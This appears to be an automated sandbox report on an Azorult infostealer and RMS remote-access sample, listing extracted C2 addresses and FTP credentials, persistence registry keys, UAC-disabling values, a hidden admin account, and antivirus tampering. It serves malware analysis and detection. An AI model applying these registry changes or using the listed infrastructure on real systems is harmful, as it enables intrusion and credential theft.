Behavioral Report

Analysis

max time kernel
147s
max time network
170s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 16:58

Sharing

Copy URL

Twitter E-mail

Report Files Registry Network Processes Mutex Misc

General

Target

LtHv0O2KZDK4M637.exe

Score

10^/10

azorult rms aspackv2 discovery evasion infostealer persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.81
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings ⋅ 3 TTPs
evasion trojan

TTPs:

Modify Registry Modify Existing Service Disabling Security Tools
Modifies visiblity of hidden/system files in Explorer ⋅ 2 TTPs
evasion

TTPs:

Hidden Files and Directories Modify Registry
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass ⋅ 3 TTPs
evasion trojan

TTPs:

Bypass User Account Control Disabling Security Tools Modify Registry
Windows security bypass ⋅ 2 TTPs
evasion trojan

TTPs:

Disabling Security Tools Modify Registry
ACProtect 1.3x - 1.4x DLL software ⋅ 2 IoCs
Detects file using ACProtect software.

Processes:

resource yara_rule

behavioral28/files/0x000100000001abe0-49.dat acprotect
behavioral28/files/0x000100000001abe1-50.dat acprotect
Grants admin privileges ⋅ 1 TTPs
Uses net.exe to modify the user's privileges.

TTPs:

Account Manipulation

resource	yara_rule
behavioral28/files/0x000100000001abe0-49.dat	acprotect
behavioral28/files/0x000100000001abe1-50.dat	acprotect

ASPack v2.12-2.42 ⋅ 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
behavioral28/files/0x000200000001abdd-32.dat	aspack_v212_v242
behavioral28/files/0x000200000001abdd-33.dat	aspack_v212_v242
behavioral28/files/0x000200000001abdd-39.dat	aspack_v212_v242
behavioral28/files/0x000200000001abdd-41.dat	aspack_v212_v242
behavioral28/files/0x000200000001abdd-48.dat	aspack_v212_v242
behavioral28/files/0x000300000001a4f4-51.dat	aspack_v212_v242
behavioral28/files/0x000300000001a4f4-56.dat	aspack_v212_v242
behavioral28/files/0x000300000001a4f4-55.dat	aspack_v212_v242
behavioral28/files/0x000300000001a4f4-68.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory ⋅ 4 IoCs

Processes:

taskhost.exeLtHv0O2KZDK4M637.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	LtHv0O2KZDK4M637.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File created	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe

Executes dropped EXE ⋅ 18 IoCs

Processes:

wini.exewinit.exesys.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exerfusclient.execheat.exetaskhost.exetaskhostw.exeR8.exewinlogon.exeRar.exeRDPWInst.exeRDPWInst.exe

pid	process
3032	wini.exe
3304	winit.exe
3028	sys.exe
3860	rutserv.exe
356	rutserv.exe
2616	rutserv.exe
420	rutserv.exe
2928	rfusclient.exe
760	rfusclient.exe
3464	rfusclient.exe
2180	cheat.exe
1968	taskhost.exe
3356	taskhostw.exe
820	R8.exe
3160	winlogon.exe
3848	Rar.exe
4756	RDPWInst.exe
4672	RDPWInst.exe

Modifies Windows Firewall ⋅ 1 TTPs
evasion

TTPs:

Modify Existing Service
Sets DLL path for service in the registry ⋅ 2 TTPs
persistence

TTPs:

Registry Run Keys / Startup Folder Modify Registry
Sets file to hidden ⋅ 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

TTPs:

Hidden Files and Directories
Stops running service(s) ⋅ 3 TTPs
evasion

TTPs:

Modify Existing Service Service Stop

UPX packed file ⋅ 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral28/files/0x000100000001abe0-49.dat	upx
behavioral28/files/0x000100000001abe1-50.dat	upx
behavioral28/files/0x000200000001abec-98.dat	upx
behavioral28/files/0x000200000001abec-99.dat	upx

Loads dropped DLL ⋅ 7 IoCs

Processes:

sys.exesvchost.exe

pid process

3028 sys.exe
3028 sys.exe
3028 sys.exe
3028 sys.exe
3028 sys.exe
3028 sys.exe
5460 svchost.exe

pid	process
3028	sys.exe
3028	sys.exe
3028	sys.exe
3028	sys.exe
3028	sys.exe
3028	sys.exe
5460	svchost.exe

Modifies file permissions ⋅ 1 TTPs 64 IoCs

discovery

TTPs:

File Permissions Modification

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
5976	icacls.exe
5744	icacls.exe
6136	icacls.exe
5768	icacls.exe
4508	icacls.exe
5520	icacls.exe
5260	icacls.exe
5572	icacls.exe
5824	icacls.exe
5816	icacls.exe
5140	icacls.exe
2860	icacls.exe
1704	icacls.exe
5968	icacls.exe
5668	icacls.exe
5736	icacls.exe
5328	icacls.exe
5584	icacls.exe
5188	icacls.exe
5588	icacls.exe
2132	icacls.exe
5544	icacls.exe
5628	icacls.exe
5492	icacls.exe
4464	icacls.exe
5148	icacls.exe
4336	icacls.exe
5924	icacls.exe
2832	icacls.exe
2192	icacls.exe
5500	icacls.exe
5996	icacls.exe
3824	icacls.exe
6024	icacls.exe
400	icacls.exe
4004	icacls.exe
396	icacls.exe
4620	icacls.exe
5932	icacls.exe
1616	icacls.exe
5216	icacls.exe
4516	icacls.exe
4100	icacls.exe
5200	icacls.exe
5680	icacls.exe
5812	icacls.exe
744	icacls.exe
5152	icacls.exe
2356	icacls.exe
5796	icacls.exe
5472	icacls.exe
4112	icacls.exe
5528	icacls.exe
6060	icacls.exe
5396	icacls.exe
2176	icacls.exe
1560	icacls.exe
5576	icacls.exe
6020	icacls.exe
5904	icacls.exe
1312	icacls.exe
5832	icacls.exe
6064	icacls.exe
5720	icacls.exe

Reads data files stored by FTP clients ⋅ 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Reads local data of messenger clients ⋅ 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Reads user/profile data of local email clients ⋅ 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Reads user/profile data of web browsers ⋅ 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Accesses cryptocurrency files/wallets, possible credential harvesting ⋅ 2 TTPs
spyware

TTPs:

Data from Local System Credentials in Files

Adds Run key to start application ⋅ 2 TTPs 4 IoCs

persistence

TTPs:

Registry Run Keys / Startup Folder Modify Registry

Processes:

taskhostw.exeLtHv0O2KZDK4M637.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	LtHv0O2KZDK4M637.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe

Checks installed software on the system ⋅ 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

TTPs:

Query Registry
Checks whether UAC is enabled ⋅ 1 TTPs 1 IoCs
evasion trojan

TTPs:

System Information Discovery

Processes:

LtHv0O2KZDK4M637.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.exe
Legitimate hosting services abused for malware hosting/C2 ⋅ 1 TTPs

TTPs:

Web Service
Looks up external IP address via web service ⋅ 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 ip-api.com

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.exe

flow	ioc
10	ip-api.com

Modifies WinLogon ⋅ 2 TTPs 7 IoCs

persistence

TTPs:

Winlogon Helper DLL Modify Registry

Processes:

LtHv0O2KZDK4M637.exeRDPWInst.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in Program Files directory ⋅ 31 IoCs

Processes:

attrib.exeattrib.exetaskhost.exeattrib.exeRDPWInst.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Program Files\360\Total Security	attrib.exe
File opened for modification	C:\Program Files\Malwarebytes\Anti-Malware	attrib.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	taskhost.exe
File opened for modification	C:\Program Files\AVAST Software\Avast	attrib.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	taskhost.exe
File opened for modification	C:\Program Files\ByteFence	taskhost.exe
File opened for modification	C:\Program Files\Malwarebytes	taskhost.exe
File opened for modification	C:\Program Files\COMODO	taskhost.exe
File opened for modification	C:\Program Files\Enigma Software Group	taskhost.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files\ESET	taskhost.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	taskhost.exe
File created	C:\Program Files\Common Files\System\iexplore.exe	taskhost.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files\Kaspersky Lab	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files\AVG	taskhost.exe
File opened for modification	C:\Program Files (x86)\AVG	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files (x86)\Cezurity	taskhost.exe
File opened for modification	C:\Program Files\Cezurity	taskhost.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files (x86)\Zaxar	taskhost.exe
File opened for modification	C:\Program Files (x86)\360	taskhost.exe
File opened for modification	C:\Program Files\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	taskhost.exe
File opened for modification	C:\Program Files\ESET	attrib.exe
File opened for modification	C:\Program Files\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files (x86)\Panda Security	taskhost.exe

Drops file in Windows directory ⋅ 8 IoCs

Processes:

taskhost.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\boy.exe	taskhost.exe
File created	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\NetworkDistribution	taskhost.exe
File created	C:\Windows\java.exe	taskhost.exe
File opened for modification	C:\Windows\java.exe	taskhost.exe
File opened for modification	C:\WINDOWS\McMwt	attrib.exe
File created	C:\Windows\boy.exe	taskhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices ⋅ 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs:

System Information Discovery

Checks processor information in registry ⋅ 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

TTPs:

Query Registry System Information Discovery

Processes:

sys.exewinit.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	sys.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sys.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe ⋅ 9 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1028 timeout.exe
4840 timeout.exe
5728 timeout.exe
4156 timeout.exe
1120 timeout.exe
5248 timeout.exe
2208 timeout.exe
2408 timeout.exe
2148 timeout.exe
Gathers network information ⋅ 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

TTPs:

System Information Discovery Command-Line Interface

Processes:

ipconfig.exe

pid process

4392 ipconfig.exe
Kills process with taskkill ⋅ 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1932 taskkill.exe
1504 taskkill.exe
5240 taskkill.exe
5060 taskkill.exe
2036 taskkill.exe
3412 taskkill.exe

pid	process
1028	timeout.exe
4840	timeout.exe
5728	timeout.exe
4156	timeout.exe
1120	timeout.exe
5248	timeout.exe
2208	timeout.exe
2408	timeout.exe
2148	timeout.exe

pid	process
4392	ipconfig.exe

pid	process
1932	taskkill.exe
1504	taskkill.exe
5240	taskkill.exe
5060	taskkill.exe
2036	taskkill.exe
3412	taskkill.exe

Modifies registry class ⋅ 6 IoCs

Processes:

wini.exewinit.exeR8.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe

NTFS ADS ⋅ 2 IoCs

Processes:

taskhostw.exeLtHv0O2KZDK4M637.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	LtHv0O2KZDK4M637.exe

Runs .reg file with regedit ⋅ 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

1836 regedit.exe
3548 regedit.exe
Runs net.exe

pid	process
1836	regedit.exe
3548	regedit.exe

Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs

Processes:

LtHv0O2KZDK4M637.exe

pid	process
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe

Suspicious behavior: GetForegroundWindowSpam ⋅ 1 IoCs

Processes:

taskhostw.exe

pid process

3356 taskhostw.exe
Suspicious behavior: LoadsDriver ⋅ 2 IoCs

Processes:

pid process

624
624
Suspicious behavior: SetClipboardViewer ⋅ 1 IoCs

Processes:

rfusclient.exe

pid process

3464 rfusclient.exe

pid	process
3356	taskhostw.exe

pid	process
624
624

pid	process
3464	rfusclient.exe

Suspicious use of AdjustPrivilegeToken ⋅ 64 IoCs

Processes:

rutserv.exerutserv.exerutserv.exeLtHv0O2KZDK4M637.exe

description	pid	process
Token: SeDebugPrivilege	3860	rutserv.exe
Token: SeDebugPrivilege	2616	rutserv.exe
Token: SeTakeOwnershipPrivilege	420	rutserv.exe
Token: SeTcbPrivilege	420	rutserv.exe
Token: SeTcbPrivilege	420	rutserv.exe
Token: SeDebugPrivilege	644	LtHv0O2KZDK4M637.exe
Token: 9799907557102771160	644	LtHv0O2KZDK4M637.exe
Token: 9800291286595393505	644	LtHv0O2KZDK4M637.exe
Token: 9800335267068368489	644	LtHv0O2KZDK4M637.exe
Token: 9800336366579799654	644	LtHv0O2KZDK4M637.exe
Token: 9800337466091755107	644	LtHv0O2KZDK4M637.exe
Token: 9800347361702499976	644	LtHv0O2KZDK4M637.exe
Token: 9800348461214455429	644	LtHv0O2KZDK4M637.exe
Token: 9800380347052775150	644	LtHv0O2KZDK4M637.exe
Token: 9800381446564730603	644	LtHv0O2KZDK4M637.exe
Token: 9800401237777830165	644	LtHv0O2KZDK4M637.exe
Token: 9800414431923917105	644	LtHv0O2KZDK4M637.exe
Token: 9800452914833445288	644	LtHv0O2KZDK4M637.exe
Token: 9800535378224337031	644	LtHv0O2KZDK4M637.exe
Token: 9800543074802782354	644	LtHv0O2KZDK4M637.exe
Token: 9800558467972780232	644	LtHv0O2KZDK4M637.exe
Token: 9800559567484735685	644	LtHv0O2KZDK4M637.exe
Token: 9800569463086567658	644	LtHv0O2KZDK4M637.exe
Token: 9800688210497819174	644	LtHv0O2KZDK4M637.exe
Token: 9800692608549311034	644	LtHv0O2KZDK4M637.exe
Token: 9800699205620519496	644	LtHv0O2KZDK4M637.exe
Token: 9800714598781604478	644	LtHv0O2KZDK4M637.exe
Token: 9800729991947408020	644	LtHv0O2KZDK4M637.exe
Token: 9800738788046197436	644	LtHv0O2KZDK4M637.exe
Token: 9800749783164179166	644	LtHv0O2KZDK4M637.exe
Token: 9800765176329982708	644	LtHv0O2KZDK4M637.exe
Token: 9800769574377278728	644	LtHv0O2KZDK4M637.exe
Token: 9800770673889234181	644	LtHv0O2KZDK4M637.exe
Token: 9800771773400665346	644	LtHv0O2KZDK4M637.exe
Token: 9800775071932337433	644	LtHv0O2KZDK4M637.exe
Token: 9800780569491066154	644	LtHv0O2KZDK4M637.exe
Token: 9800809156802956668	644	LtHv0O2KZDK4M637.exe
Token: 9800810256314912121	644	LtHv0O2KZDK4M637.exe
Token: 9800820151920938398	644	LtHv0O2KZDK4M637.exe
Token: 9800831147035250080	644	LtHv0O2KZDK4M637.exe
Token: 9800832246551399869	644	LtHv0O2KZDK4M637.exe
Token: 9800848739224440272	644	LtHv0O2KZDK4M637.exe
Token: 9800857535323229688	644	LtHv0O2KZDK4M637.exe
Token: 9800861933370526732	644	LtHv0O2KZDK4M637.exe
Token: 9800872928484314158	644	LtHv0O2KZDK4M637.exe
Token: 9800885023118969933	644	LtHv0O2KZDK4M637.exe
Token: 9800891620185459803	644	LtHv0O2KZDK4M637.exe
Token: 9800909212378844299	644	LtHv0O2KZDK4M637.exe
Token: 9800923506028498084	644	LtHv0O2KZDK4M637.exe
Token: 9800927904079989944	644	LtHv0O2KZDK4M637.exe
Token: 9800935600662629571	644	LtHv0O2KZDK4M637.exe
Token: 9800943297241074926	644	LtHv0O2KZDK4M637.exe
Token: 9800996073674428286	644	LtHv0O2KZDK4M637.exe
Token: 9800999372214488949	644	LtHv0O2KZDK4M637.exe
Token: 9801020262939021244	644	LtHv0O2KZDK4M637.exe
Token: 9801038954635972585	644	LtHv0O2KZDK4M637.exe
Token: 9801040054147403750	644	LtHv0O2KZDK4M637.exe
Token: 9801059845360504336	644	LtHv0O2KZDK4M637.exe
Token: 9801062044383890986	644	LtHv0O2KZDK4M637.exe
Token: 9801073039506591308	644	LtHv0O2KZDK4M637.exe
Token: 81688264704	644	LtHv0O2KZDK4M637.exe
Token: 0	644	LtHv0O2KZDK4M637.exe
Token: 274877907072	644	LtHv0O2KZDK4M637.exe
Token: 0	644	LtHv0O2KZDK4M637.exe

Suspicious use of SetWindowsHookEx ⋅ 11 IoCs

Processes:

winit.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhost.exetaskhostw.exeR8.exewinlogon.exe

pid	process
3304	winit.exe
3860	rutserv.exe
356	rutserv.exe
2616	rutserv.exe
420	rutserv.exe
3928	WinMail.exe
3312	WinMail.exe
1968	taskhost.exe
3356	taskhostw.exe
820	R8.exe
3160	winlogon.exe

Suspicious use of WriteProcessMemory ⋅ 64 IoCs

Processes:

LtHv0O2KZDK4M637.exewini.exeWScript.execmd.exerutserv.exesys.execmd.exewinit.exeWinMail.exe

description	pid	process	target process
PID 644 wrote to memory of 3032	644	LtHv0O2KZDK4M637.exe	wini.exe
PID 644 wrote to memory of 3032	644	LtHv0O2KZDK4M637.exe	wini.exe
PID 644 wrote to memory of 3032	644	LtHv0O2KZDK4M637.exe	wini.exe
PID 3032 wrote to memory of 1524	3032	wini.exe	WScript.exe
PID 3032 wrote to memory of 1524	3032	wini.exe	WScript.exe
PID 3032 wrote to memory of 1524	3032	wini.exe	WScript.exe
PID 3032 wrote to memory of 3304	3032	wini.exe	winit.exe
PID 3032 wrote to memory of 3304	3032	wini.exe	winit.exe
PID 3032 wrote to memory of 3304	3032	wini.exe	winit.exe
PID 1524 wrote to memory of 1528	1524	WScript.exe	cmd.exe
PID 1524 wrote to memory of 1528	1524	WScript.exe	cmd.exe
PID 1524 wrote to memory of 1528	1524	WScript.exe	cmd.exe
PID 1528 wrote to memory of 1836	1528	cmd.exe	regedit.exe
PID 1528 wrote to memory of 1836	1528	cmd.exe	regedit.exe
PID 1528 wrote to memory of 1836	1528	cmd.exe	regedit.exe
PID 1528 wrote to memory of 3548	1528	cmd.exe	regedit.exe
PID 1528 wrote to memory of 3548	1528	cmd.exe	regedit.exe
PID 1528 wrote to memory of 3548	1528	cmd.exe	regedit.exe
PID 1528 wrote to memory of 2208	1528	cmd.exe	timeout.exe
PID 1528 wrote to memory of 2208	1528	cmd.exe	timeout.exe
PID 1528 wrote to memory of 2208	1528	cmd.exe	timeout.exe
PID 644 wrote to memory of 3028	644	LtHv0O2KZDK4M637.exe	sys.exe
PID 644 wrote to memory of 3028	644	LtHv0O2KZDK4M637.exe	sys.exe
PID 644 wrote to memory of 3028	644	LtHv0O2KZDK4M637.exe	sys.exe
PID 1528 wrote to memory of 3860	1528	cmd.exe	rutserv.exe
PID 1528 wrote to memory of 3860	1528	cmd.exe	rutserv.exe
PID 1528 wrote to memory of 3860	1528	cmd.exe	rutserv.exe
PID 1528 wrote to memory of 356	1528	cmd.exe	rutserv.exe
PID 1528 wrote to memory of 356	1528	cmd.exe	rutserv.exe
PID 1528 wrote to memory of 356	1528	cmd.exe	rutserv.exe
PID 1528 wrote to memory of 2616	1528	cmd.exe	rutserv.exe
PID 1528 wrote to memory of 2616	1528	cmd.exe	rutserv.exe
PID 1528 wrote to memory of 2616	1528	cmd.exe	rutserv.exe
PID 420 wrote to memory of 760	420	rutserv.exe	rfusclient.exe
PID 420 wrote to memory of 760	420	rutserv.exe	rfusclient.exe
PID 420 wrote to memory of 760	420	rutserv.exe	rfusclient.exe
PID 420 wrote to memory of 2928	420	rutserv.exe	rfusclient.exe
PID 420 wrote to memory of 2928	420	rutserv.exe	rfusclient.exe
PID 420 wrote to memory of 2928	420	rutserv.exe	rfusclient.exe
PID 1528 wrote to memory of 4032	1528	cmd.exe	attrib.exe
PID 1528 wrote to memory of 4032	1528	cmd.exe	attrib.exe
PID 1528 wrote to memory of 4032	1528	cmd.exe	attrib.exe
PID 1528 wrote to memory of 2164	1528	cmd.exe	attrib.exe
PID 1528 wrote to memory of 2164	1528	cmd.exe	attrib.exe
PID 1528 wrote to memory of 2164	1528	cmd.exe	attrib.exe
PID 1528 wrote to memory of 3916	1528	cmd.exe	sc.exe
PID 1528 wrote to memory of 3916	1528	cmd.exe	sc.exe
PID 1528 wrote to memory of 3916	1528	cmd.exe	sc.exe
PID 1528 wrote to memory of 2240	1528	cmd.exe	sc.exe
PID 1528 wrote to memory of 2240	1528	cmd.exe	sc.exe
PID 1528 wrote to memory of 2240	1528	cmd.exe	sc.exe
PID 1528 wrote to memory of 1544	1528	cmd.exe	sc.exe
PID 1528 wrote to memory of 1544	1528	cmd.exe	sc.exe
PID 1528 wrote to memory of 1544	1528	cmd.exe	sc.exe
PID 3028 wrote to memory of 3124	3028	sys.exe	cmd.exe
PID 3028 wrote to memory of 3124	3028	sys.exe	cmd.exe
PID 3028 wrote to memory of 3124	3028	sys.exe	cmd.exe
PID 3124 wrote to memory of 1028	3124	cmd.exe	timeout.exe
PID 3124 wrote to memory of 1028	3124	cmd.exe	timeout.exe
PID 3124 wrote to memory of 1028	3124	cmd.exe	timeout.exe
PID 3304 wrote to memory of 3928	3304	winit.exe	WinMail.exe
PID 3304 wrote to memory of 3928	3304	winit.exe	WinMail.exe
PID 3304 wrote to memory of 3928	3304	winit.exe	WinMail.exe
PID 3928 wrote to memory of 3312	3928	WinMail.exe	WinMail.exe

System policy modification ⋅ 1 TTPs 3 IoCs

evasion

TTPs:

Modify Registry

Processes:

LtHv0O2KZDK4M637.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	LtHv0O2KZDK4M637.exe

Views/modifies file attributes ⋅ 1 TTPs 31 IoCs

evasion

TTPs:

Hidden Files and Directories

Processes:

